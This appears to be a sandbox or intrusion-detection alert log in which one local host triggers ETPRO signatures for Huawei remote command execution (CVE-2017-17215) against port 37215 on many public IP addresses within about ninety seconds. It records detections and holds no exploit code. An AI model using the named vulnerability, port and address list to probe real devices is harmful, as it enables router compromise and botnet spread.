                                                    07/10/24-08:27:20.454576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.1494.167.230.164
                                                    07/10/24-08:26:47.945197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635637215192.168.2.14157.211.72.167
                                                    07/10/24-08:26:13.828221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039437215192.168.2.14157.225.188.176
                                                    07/10/24-08:27:31.553494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086437215192.168.2.1481.241.230.86
                                                    07/10/24-08:26:13.816955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930437215192.168.2.14157.101.103.193
                                                    07/10/24-08:27:08.377189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759637215192.168.2.14157.249.183.124
                                                    07/10/24-08:27:19.182366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789637215192.168.2.1441.57.78.59
                                                    07/10/24-08:26:36.424443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695237215192.168.2.14121.105.146.110
                                                    07/10/24-08:27:14.829159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276637215192.168.2.14157.233.72.46
                                                    07/10/24-08:26:20.175681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519437215192.168.2.14197.165.148.213
                                                    07/10/24-08:26:14.623254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020037215192.168.2.14197.2.78.1
                                                    07/10/24-08:26:28.733035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.14139.36.198.56
                                                    07/10/24-08:26:29.887676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4454437215192.168.2.14157.39.61.3
                                                    07/10/24-08:27:32.619838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151237215192.168.2.14157.204.44.168
                                                    07/10/24-08:27:33.764510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14157.82.234.29
                                                    07/10/24-08:27:13.963360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732237215192.168.2.14157.236.140.145
                                                    07/10/24-08:26:29.824818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4303837215192.168.2.14197.84.200.238
                                                    07/10/24-08:26:38.569850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241237215192.168.2.1441.221.80.152
                                                    07/10/24-08:26:49.764641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787037215192.168.2.1439.214.1.102
                                                    07/10/24-08:26:47.909610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451837215192.168.2.1441.107.50.33
                                                    07/10/24-08:26:15.852897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116437215192.168.2.14218.219.1.207
                                                    07/10/24-08:27:08.399018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932837215192.168.2.14157.229.39.47
                                                    07/10/24-08:26:28.830687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982437215192.168.2.1441.105.97.173
                                                    07/10/24-08:26:14.777167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750037215192.168.2.14197.121.131.197
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048837215192.168.2.14157.15.16.230
                                                    07/10/24-08:26:31.103599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421837215192.168.2.1441.174.46.85
                                                    07/10/24-08:26:53.199768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607237215192.168.2.1436.171.119.143
                                                    07/10/24-08:27:02.918054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351437215192.168.2.14157.249.67.79
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974437215192.168.2.14197.169.255.172
                                                    07/10/24-08:26:11.661764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103037215192.168.2.14157.50.253.146
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315037215192.168.2.1441.125.96.130
                                                    07/10/24-08:27:28.087118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634037215192.168.2.14216.41.203.119
                                                    07/10/24-08:27:33.817300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.1441.168.170.167
                                                    07/10/24-08:26:59.842336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583237215192.168.2.14197.156.17.82
                                                    07/10/24-08:27:05.200421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876437215192.168.2.14157.216.173.106
                                                    07/10/24-08:27:22.873299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805837215192.168.2.14176.104.164.27
                                                    07/10/24-08:27:23.507926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.14165.33.234.197
                                                    07/10/24-08:26:14.787511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050437215192.168.2.1441.252.140.196
                                                    07/10/24-08:26:36.373658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232437215192.168.2.14197.83.92.66
                                                    07/10/24-08:26:38.594739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324437215192.168.2.1441.220.142.220
                                                    07/10/24-08:26:15.813714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.14157.69.78.10
                                                    07/10/24-08:26:13.671572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766437215192.168.2.1441.14.235.23
                                                    07/10/24-08:26:38.599918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861637215192.168.2.14197.107.36.159
                                                    07/10/24-08:26:45.638729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725437215192.168.2.1441.235.206.199
                                                    07/10/24-08:27:33.952694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648437215192.168.2.1441.81.30.216
                                                    07/10/24-08:27:30.541025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752437215192.168.2.14157.0.252.168
                                                    07/10/24-08:26:45.643057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641437215192.168.2.14197.145.210.218
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857437215192.168.2.14157.42.252.9
                                                    07/10/24-08:26:28.739642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311637215192.168.2.14197.20.155.142
                                                    07/10/24-08:26:43.634371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456437215192.168.2.1427.69.52.253
                                                    07/10/24-08:26:55.408073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732437215192.168.2.14157.86.130.124
                                                    07/10/24-08:26:22.299377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906837215192.168.2.14157.220.188.83
                                                    07/10/24-08:26:34.222864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963237215192.168.2.1441.40.51.49
                                                    07/10/24-08:26:31.065729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.1441.204.110.217
                                                    07/10/24-08:26:57.522324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300437215192.168.2.1441.196.86.250
                                                    07/10/24-08:26:36.365413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264037215192.168.2.1441.184.44.248
                                                    07/10/24-08:26:38.617704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394637215192.168.2.14156.136.11.40
                                                    07/10/24-08:27:32.612334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204437215192.168.2.14157.104.114.128
                                                    07/10/24-08:27:33.730213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222837215192.168.2.14197.166.165.166
                                                    07/10/24-08:27:22.829314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668837215192.168.2.1495.163.204.52
                                                    07/10/24-08:26:42.416063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685637215192.168.2.1451.198.111.38
                                                    07/10/24-08:26:25.522159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357637215192.168.2.1441.116.53.2
                                                    07/10/24-08:26:34.222864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630837215192.168.2.1412.58.122.151
                                                    07/10/24-08:26:11.587895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153637215192.168.2.1441.211.128.190
                                                    07/10/24-08:26:20.098381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386837215192.168.2.14157.245.72.235
                                                    07/10/24-08:26:59.534289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957237215192.168.2.14157.189.137.172
                                                    07/10/24-08:26:22.297520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676037215192.168.2.14197.110.52.247
                                                    07/10/24-08:26:41.462014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483437215192.168.2.1418.115.121.66
                                                    07/10/24-08:26:28.787394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735637215192.168.2.14197.158.225.154
                                                    07/10/24-08:26:13.851265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589637215192.168.2.14157.18.54.92
                                                    07/10/24-08:27:17.076959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470237215192.168.2.14171.161.4.238
                                                    07/10/24-08:26:38.652814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758437215192.168.2.1473.203.186.220
                                                    07/10/24-08:26:22.279073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705837215192.168.2.1441.127.39.6
                                                    07/10/24-08:26:42.388281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.14197.71.53.200
                                                    07/10/24-08:26:59.801694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792837215192.168.2.14197.6.25.11
                                                    07/10/24-08:27:05.129654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496637215192.168.2.1441.171.128.229
                                                    07/10/24-08:27:05.133691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546637215192.168.2.1441.182.151.43
                                                    07/10/24-08:26:57.660601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766037215192.168.2.14157.100.227.124
                                                    07/10/24-08:27:10.663912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624437215192.168.2.14197.136.172.110
                                                    07/10/24-08:26:13.675560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433637215192.168.2.14197.112.168.229
                                                    07/10/24-08:27:22.872450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955037215192.168.2.14157.102.52.224
                                                    07/10/24-08:27:03.000855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299237215192.168.2.14197.177.202.175
                                                    07/10/24-08:27:13.891994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044437215192.168.2.14197.22.249.87
                                                    07/10/24-08:26:13.825094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.1441.184.171.245
                                                    07/10/24-08:27:05.104096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521637215192.168.2.14157.62.86.107
                                                    07/10/24-08:27:07.376738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133837215192.168.2.14157.151.240.218
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034637215192.168.2.14197.20.251.25
                                                    07/10/24-08:27:22.890637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451837215192.168.2.14197.13.178.132
                                                    07/10/24-08:26:55.268885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738637215192.168.2.14197.88.120.230
                                                    07/10/24-08:27:10.712804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254437215192.168.2.14157.39.8.6
                                                    07/10/24-08:27:14.835457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068237215192.168.2.14157.144.194.184
                                                    07/10/24-08:27:20.517321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756437215192.168.2.14157.159.137.220
                                                    07/10/24-08:27:32.489604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330237215192.168.2.1448.187.224.215
                                                    07/10/24-08:27:22.781993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.14212.209.85.33
                                                    07/10/24-08:27:30.428214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377437215192.168.2.14157.226.49.192
                                                    07/10/24-08:26:41.424240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860037215192.168.2.1441.94.220.47
                                                    07/10/24-08:26:43.681419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875437215192.168.2.14197.141.45.88
                                                    07/10/24-08:27:27.040022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.1441.36.236.247
                                                    07/10/24-08:26:28.878894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.14157.22.76.64
                                                    07/10/24-08:26:26.583862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651437215192.168.2.14197.231.212.198
                                                    07/10/24-08:26:59.834726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.14151.2.94.236
                                                    07/10/24-08:27:31.548799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348637215192.168.2.1490.234.122.199
                                                    07/10/24-08:27:02.892179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412837215192.168.2.1479.16.246.116
                                                    07/10/24-08:27:05.132533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741237215192.168.2.1441.233.222.85
                                                    07/10/24-08:27:32.584145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364237215192.168.2.14198.193.61.193
                                                    07/10/24-08:26:11.129630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102037215192.168.2.1441.196.126.1
                                                    07/10/24-08:26:53.135908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757437215192.168.2.14197.14.133.83
                                                    07/10/24-08:26:20.159669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362037215192.168.2.1441.21.21.12
                                                    07/10/24-08:27:32.614607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.14157.120.232.105
                                                    07/10/24-08:26:14.748611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002237215192.168.2.1441.174.91.155
                                                    07/10/24-08:26:14.822154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142637215192.168.2.1441.241.29.18
                                                    07/10/24-08:26:47.880980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592437215192.168.2.14197.15.189.78
                                                    07/10/24-08:26:47.926462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447637215192.168.2.1441.9.69.71
                                                    07/10/24-08:27:19.306995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526837215192.168.2.14197.210.98.82
                                                    07/10/24-08:27:30.454516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642037215192.168.2.14197.97.187.213
                                                    07/10/24-08:26:26.594913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821437215192.168.2.14157.113.156.32
                                                    07/10/24-08:26:57.574047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698437215192.168.2.14157.173.26.78
                                                    07/10/24-08:26:11.126416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231237215192.168.2.1441.36.102.72
                                                    07/10/24-08:26:29.849428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493637215192.168.2.1441.86.209.231
                                                    07/10/24-08:26:59.627157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.1441.99.97.92
                                                    07/10/24-08:26:43.933427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665037215192.168.2.14206.147.6.224
                                                    07/10/24-08:26:34.228514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048637215192.168.2.14157.170.159.20
                                                    07/10/24-08:26:33.243184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544637215192.168.2.14197.101.182.235
                                                    07/10/24-08:27:03.003897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894637215192.168.2.14157.161.236.90
                                                    07/10/24-08:27:19.253247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277037215192.168.2.14197.163.3.210
                                                    07/10/24-08:27:28.147073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496237215192.168.2.1452.28.156.108
                                                    07/10/24-08:26:45.611390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317637215192.168.2.1441.68.22.232
                                                    07/10/24-08:27:24.906291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542437215192.168.2.14157.20.80.192
                                                    07/10/24-08:26:11.513425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038037215192.168.2.1441.36.60.196
                                                    07/10/24-08:27:10.609606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721037215192.168.2.1441.159.198.242
                                                    07/10/24-08:27:13.800580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.14197.7.247.62
                                                    07/10/24-08:26:25.488855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649637215192.168.2.14120.214.124.54
                                                    07/10/24-08:26:59.814735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306837215192.168.2.14197.40.7.167
                                                    07/10/24-08:26:45.646162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287637215192.168.2.1441.201.133.131
                                                    07/10/24-08:26:11.595599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464837215192.168.2.14157.198.75.20
                                                    07/10/24-08:26:49.837904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448037215192.168.2.1441.255.39.201
                                                    07/10/24-08:26:45.647215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339637215192.168.2.1441.150.76.128
                                                    07/10/24-08:26:59.881196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767237215192.168.2.14157.234.58.124
                                                    07/10/24-08:27:24.981479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782837215192.168.2.14197.86.245.45
                                                    07/10/24-08:27:24.878204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979437215192.168.2.14197.189.62.141
                                                    07/10/24-08:26:14.819021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862237215192.168.2.14131.33.205.1
                                                    07/10/24-08:27:27.154416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.14157.60.55.207
                                                    07/10/24-08:26:28.835620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009237215192.168.2.14197.107.250.228
                                                    07/10/24-08:26:29.858032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400237215192.168.2.1441.231.255.248
                                                    07/10/24-08:27:30.508091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373237215192.168.2.14106.159.152.104
                                                    07/10/24-08:26:38.658230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056837215192.168.2.1441.23.59.254
                                                    07/10/24-08:26:42.367080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587837215192.168.2.14157.60.146.108
                                                    07/10/24-08:27:27.112460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698237215192.168.2.1441.150.158.165
                                                    07/10/24-08:26:14.822212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623837215192.168.2.1441.204.51.95
                                                    07/10/24-08:27:20.401175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304237215192.168.2.14157.193.20.205
                                                    07/10/24-08:26:28.792778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738837215192.168.2.1499.179.236.75
                                                    07/10/24-08:26:41.366871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621637215192.168.2.1441.110.251.197
                                                    07/10/24-08:26:59.652342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908437215192.168.2.1441.37.93.194
                                                    07/10/24-08:27:24.976551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393437215192.168.2.1441.252.23.99
                                                    07/10/24-08:26:34.217201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678837215192.168.2.1441.240.195.245
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433237215192.168.2.14197.24.229.181
                                                    07/10/24-08:26:38.648004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603037215192.168.2.14197.84.214.188
                                                    07/10/24-08:26:47.998541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104037215192.168.2.1436.232.125.68
                                                    07/10/24-08:26:29.837168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.14197.101.68.107
                                                    07/10/24-08:26:31.086994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.14197.208.10.82
                                                    07/10/24-08:27:08.371486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285437215192.168.2.148.126.81.89
                                                    07/10/24-08:27:22.480250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978637215192.168.2.14100.206.197.169
                                                    07/10/24-08:27:30.511360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792437215192.168.2.14197.180.68.200
                                                    07/10/24-08:26:28.635714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538837215192.168.2.1450.222.200.12
                                                    07/10/24-08:26:33.243765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971437215192.168.2.14101.18.181.151
                                                    07/10/24-08:26:55.456990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156637215192.168.2.1441.159.155.178
                                                    07/10/24-08:26:22.264063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899437215192.168.2.14206.38.142.225
                                                    07/10/24-08:26:11.604803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396437215192.168.2.14157.74.64.134
                                                    07/10/24-08:27:33.857818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848837215192.168.2.14157.57.86.59
                                                    07/10/24-08:27:11.504435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548637215192.168.2.1419.175.45.244
                                                    07/10/24-08:27:11.557803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071637215192.168.2.1441.60.44.74
                                                    07/10/24-08:27:28.055753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988837215192.168.2.14157.32.160.236
                                                    07/10/24-08:26:57.636058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562237215192.168.2.14197.93.37.98
                                                    07/10/24-08:26:43.664529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550037215192.168.2.14197.237.161.29
                                                    07/10/24-08:27:07.333954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400037215192.168.2.14191.159.36.137
                                                    07/10/24-08:26:26.591282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394437215192.168.2.14197.157.95.224
                                                    07/10/24-08:26:41.430084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911037215192.168.2.14197.77.86.193
                                                    07/10/24-08:26:38.623017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296837215192.168.2.14197.27.32.219
                                                    07/10/24-08:27:07.342964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269037215192.168.2.1441.89.185.39
                                                    07/10/24-08:26:52.043964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313237215192.168.2.1441.16.147.219
                                                    07/10/24-08:27:02.872496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726037215192.168.2.14157.127.217.116
                                                    07/10/24-08:27:14.022886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513837215192.168.2.14197.6.147.191
                                                    07/10/24-08:27:24.949781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232037215192.168.2.14137.64.246.173
                                                    07/10/24-08:26:42.426125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569637215192.168.2.14197.189.248.154
                                                    07/10/24-08:27:13.894673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570237215192.168.2.1441.40.38.101
                                                    07/10/24-08:26:51.966611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748237215192.168.2.1441.96.74.220
